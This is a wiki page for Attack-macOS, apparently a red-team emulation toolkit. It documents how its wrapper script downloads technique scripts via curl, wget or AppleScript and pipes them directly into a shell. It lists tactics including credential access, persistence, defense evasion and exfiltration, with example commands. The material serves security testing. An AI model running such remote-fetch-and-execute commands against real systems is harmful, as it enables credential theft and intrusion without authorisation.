Skip to content

Script Execution.md

Jump to bottom
Daniel edited this page Sep 15, 2024 · 2 revisions

Overview

Attack-macOS techniques can be executed in two ways:

  1. Using attackmacos.sh:
    This script fetches and runs techniques using curl, wget, osascript via piping the downloaded files directly to a shell for execution.

  2. Manual Execution:

  • Run individual scripts directly from the repository for more control.

  • Invoke scripts locally via attackmacos.sh

Usage

Usage: attackmacos.sh --<method> tactic=<Tactic> ttp=<TTP> --args=<arguments>
       attackmacos.sh --local tactic=<Tactic> ttp=<TTP> --args=<arguments>

Methods:
  --curl                 Use curl to download the script.
  --wget                 Use wget to download the script.
  --osascript            Use AppleScript to download the script.
  --local                Execute the script locally.

TTP arguments are unique and will not be listed here.
Check the script documentation or the script itself to find the specific arguments for each TTP.

Available Tactics:
  - Credential_Access
  - Discovery
  - Initial_Access
  - Execution
  - Persistence
  - Privilege_Escalation
  - Defense_Evasion
  - Credential_Exfiltration
  - Impact

Examples:
  ./attackmacos.sh --curl tactic=credential_access ttp=accounts --args=--help
  ./attackmacos.sh --wget tactic=discovery ttp=accounts --args='--verbose --log'
  ./attackmacos.sh --osascript tactic=initial_access ttp=accounts --args='--enable'
  ./attackmacos.sh --local tactic=execution ttp=run_script --args='-s'

Available Methods

  • --curl: Use curl to download the script.
  • --wget: Use wget to download the script.
  • --osascript: Use AppleScript to download the script.

Available Tactics

  • Credential_Access
  • Discovery
  • Initial_Access
  • Execution
  • Persistence
  • Privilege_Escalation
  • Defense_Evasion
  • Credential_Exfiltration
  • Impact

TTP Arguments

TTP arguments are unique to each TTP. Use --args=--help to print available TTP arguments."

Execution Examples

  1. Using curl to fetch a script:

    ./attackmacos.sh --curl tactic=credential_access ttp=accounts --args=--help

  2. Using wget to fetch a script:

    ./attackmacos.sh --wget tactic=discovery ttp=accounts --args='--verbose --log'

  3. Using osascript to fetch a script:

    ./attackmacos.sh --osascript tactic=initial_access ttp=accounts --args='--enable'
Clone this wiki locally